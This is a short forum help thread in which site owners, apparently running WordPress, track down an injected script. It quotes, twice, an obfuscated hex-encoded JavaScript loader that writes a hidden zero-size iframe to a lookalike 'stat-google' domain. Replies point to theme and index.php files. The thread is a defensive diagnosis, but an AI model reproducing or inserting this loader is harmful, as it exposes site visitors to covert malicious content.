VIRUS?

I’m not enabling java for your site- I would check that first.

How do I do that?

There’s a weird script at the end, after the closing </html> tag:

<script type="text/javascript">function pdteocheu(pxbunjxmvwo){var kqeplueivzvexh="";for(atctbidsttvn=0;atctbidsttvn<pxbunjxmvwo.length;atctbidsttvn+=2){kqeplueivzvexh+=(String.fromCharCode(parseInt(pxbunjxmvwo.substr(atctbidsttvn,2),16)));}document.write(kqeplueivzvexh);}pdteocheu("3C696672616D65207372633D22687474703A2F2F737461742D676F6F676C652E636F6D2F73746174732F696E6465782E70687022206672616D65626F726465723D22302220626F726465723D2230222077696474683D223022206865696768743D223022207374796C653D22706F736974696F6E3A206162736F6C7574653B207669736962696C6974793A2068696464656E3B20646973706C61793A206E6F6E65223E3C2F696672616D653E");</script><script type="text/javascript">function pdteocheu(pxbunjxmvwo){var kqeplueivzvexh="";for(atctbidsttvn=0;atctbidsttvn<pxbunjxmvwo.length;atctbidsttvn+=2){kqeplueivzvexh+=(String.fromCharCode(parseInt(pxbunjxmvwo.substr(atctbidsttvn,2),16)));}document.write(kqeplueivzvexh);}pdteocheu("3C696672616D65207372633D22687474703A2F2F737461742D676F6F676C652E636F6D2F73746174732F696E6465782E70687022206672616D65626F726465723D22302220626F726465723D2230222077696474683D223022206865696768743D223022207374796C653D22706F736974696F6E3A206162736F6C7574653B207669736962696C6974793A2068696464656E3B20646973706C61793A206E6F6E65223E3C2F696672616D653E");</script>

I’m having trouble tracking that down

Did you check he footer.php file in your current theme’s templates?

I did.

Any ideas?

Hi,

Try looking in index.php. I just had the same problem and it was there.

TrendMicro detects it. I have Kasperski Internet Security 7 but it didn’t. I looked in the source code and that where I detected the script at the bottom and outside the <html> labels. I looked in index.php and it was there.